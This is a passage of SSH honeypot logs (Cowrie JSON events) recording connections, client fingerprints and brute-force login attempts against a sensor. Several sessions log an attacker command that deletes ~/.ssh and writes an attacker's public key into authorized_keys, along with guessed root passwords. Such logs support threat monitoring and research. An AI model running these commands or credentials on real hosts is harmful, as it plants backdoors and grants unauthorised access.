hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:43:00.544672Z","src_ip":"212.227.125.160","session":"163f9aa422ca"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:43:01.132127Z","src_ip":"212.227.235.229","session":"008f17cb3e9d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T00:43:01.132955Z","src_ip":"212.227.235.229","session":"008f17cb3e9d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T00:43:01.414254Z","src_ip":"212.227.235.229","session":"008f17cb3e9d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:43:01.415296Z","src_ip":"212.227.235.229","session":"008f17cb3e9d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43214,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad04767a83c1","protocol":"ssh","message":"New connection: 212.227.235.229:43214 (1.2.3.4:22) [session: ad04767a83c1]","sensor":"my-vps","timestamp":"2025-08-31T00:43:01.692187Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:43:01.692860Z","src_ip":"212.227.235.229","session":"ad04767a83c1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:43:01.971854Z","src_ip":"212.227.235.229","session":"ad04767a83c1"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"12345","message":"login attempt [daemon/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T00:43:02.423895Z","src_ip":"212.227.125.160","session":"163f9aa422ca"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T00:43:03.127425Z","src_ip":"212.227.235.229","session":"ad04767a83c1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51868,"dst_ip":"1.2.3.4","dst_port":22,"session":"09a8cecfbd3b","protocol":"ssh","message":"New connection: 212.227.235.229:51868 (1.2.3.4:22) [session: 09a8cecfbd3b]","sensor":"my-vps","timestamp":"2025-08-31T00:43:03.478198Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:43:03.479023Z","src_ip":"212.227.235.229","session":"09a8cecfbd3b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:43:03.830914Z","src_ip":"212.227.235.229","session":"09a8cecfbd3b"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:43:03.966737Z","src_ip":"212.227.125.160","session":"163f9aa422ca"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:43:04.408026Z","src_ip":"212.227.235.229","session":"ad04767a83c1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43222,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4bac2faf385","protocol":"ssh","message":"New connection: 212.227.235.229:43222 (1.2.3.4:22) [session: b4bac2faf385]","sensor":"my-vps","timestamp":"2025-08-31T00:43:04.699007Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:43:04.699969Z","src_ip":"212.227.235.229","session":"b4bac2faf385"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:43:04.991653Z","src_ip":"212.227.235.229","session":"b4bac2faf385"}
{"eventid":"cowrie.login.success","username":"root","password":"h","message":"login attempt [root/h] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:43:05.281541Z","src_ip":"212.227.235.229","session":"09a8cecfbd3b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:43:06.008248Z","src_ip":"212.227.235.229","session":"09a8cecfbd3b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:43:06.009166Z","src_ip":"212.227.235.229","session":"09a8cecfbd3b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:43:06.010363Z","src_ip":"212.227.235.229","session":"09a8cecfbd3b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:43:06.202236Z","src_ip":"212.227.235.229","session":"b4bac2faf385"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:43:06.363966Z","src_ip":"212.227.235.229","session":"09a8cecfbd3b"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:43:06.495628Z","src_ip":"212.227.235.229","session":"008f17cb3e9d"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:43:06.496741Z","src_ip":"212.227.235.229","session":"b4bac2faf385"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:43:07.127784Z","src_ip":"212.227.235.229","session":"09a8cecfbd3b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T00:43:07.128482Z","src_ip":"212.227.235.229","session":"09a8cecfbd3b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T00:43:07.483072Z","src_ip":"212.227.235.229","session":"09a8cecfbd3b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:43:07.484039Z","src_ip":"212.227.235.229","session":"09a8cecfbd3b"}
{"eventid":"cowrie.login.success","username":"root","password":"focvs2019","message":"login attempt [root/focvs2019] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:43:08.190219Z","src_ip":"201.148.180.50","session":"c9da96624a3d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36226,"dst_ip":"1.2.3.4","dst_port":22,"session":"58e1944bb84a","protocol":"ssh","message":"New connection: 212.227.235.229:36226 (1.2.3.4:22) [session: 58e1944bb84a]","sensor":"my-vps","timestamp":"2025-08-31T00:43:08.808774Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:43:08.809612Z","src_ip":"212.227.235.229","session":"58e1944bb84a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:43:09.115970Z","src_ip":"212.227.235.229","session":"58e1944bb84a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60476,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a24bcdca407","protocol":"ssh","message":"New connection: 212.227.125.160:60476 (1.2.3.4:22) [session: 1a24bcdca407]","sensor":"my-vps","timestamp":"2025-08-31T00:43:09.252286Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:43:09.253212Z","src_ip":"212.227.125.160","session":"1a24bcdca407"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:43:09.328047Z","src_ip":"212.227.125.160","session":"1a24bcdca407"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"sonar123","message":"login attempt [sonar/sonar123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:43:09.559062Z","src_ip":"212.227.125.160","session":"1a24bcdca407"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T00:43:10.383183Z","src_ip":"212.227.235.229","session":"58e1944bb84a"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:43:10.690518Z","src_ip":"212.227.125.160","session":"1a24bcdca407"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:43:10.879560Z","src_ip":"201.148.180.50","session":"c9da96624a3d"}
{"eventid":"cowrie.command.input","input":"uptime","message":"CMD: uptime","sensor":"my-vps","timestamp":"2025-08-31T00:43:10.880308Z","src_ip":"201.148.180.50","session":"c9da96624a3d"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:43:11.691664Z","src_ip":"212.227.235.229","session":"58e1944bb84a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36234,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1d6d0961331","protocol":"ssh","message":"New connection: 212.227.235.229:36234 (1.2.3.4:22) [session: d1d6d0961331]","sensor":"my-vps","timestamp":"2025-08-31T00:43:12.050851Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:43:12.052005Z","src_ip":"212.227.235.229","session":"d1d6d0961331"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:43:12.407290Z","src_ip":"212.227.235.229","session":"d1d6d0961331"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","size":69,"shasum":"dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","duplicate":true,"duration":"2.4","message":"Closing TTY Log: var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802 after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:43:13.327432Z","src_ip":"201.148.180.50","session":"c9da96624a3d"}
{"eventid":"cowrie.session.closed","duration":"14.7","message":"Connection lost after 14.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:43:13.328646Z","src_ip":"201.148.180.50","session":"c9da96624a3d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:43:13.871802Z","src_ip":"212.227.235.229","session":"d1d6d0961331"}
{"eventid":"cowrie.session.connect","src_ip":"203.195.82.145","src_port":52418,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ff7f15e8ea1","protocol":"ssh","message":"New connection: 203.195.82.145:52418 (1.2.3.4:22) [session: 8ff7f15e8ea1]","sensor":"my-vps","timestamp":"2025-08-31T00:43:14.047782Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:43:14.048847Z","src_ip":"203.195.82.145","session":"8ff7f15e8ea1"}
{"eventid":"cowrie.session.closed","duration":"10.7","message":"Connection lost after 10.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:43:14.225063Z","src_ip":"212.227.235.229","session":"09a8cecfbd3b"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:43:14.228403Z","src_ip":"212.227.235.229","session":"d1d6d0961331"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-s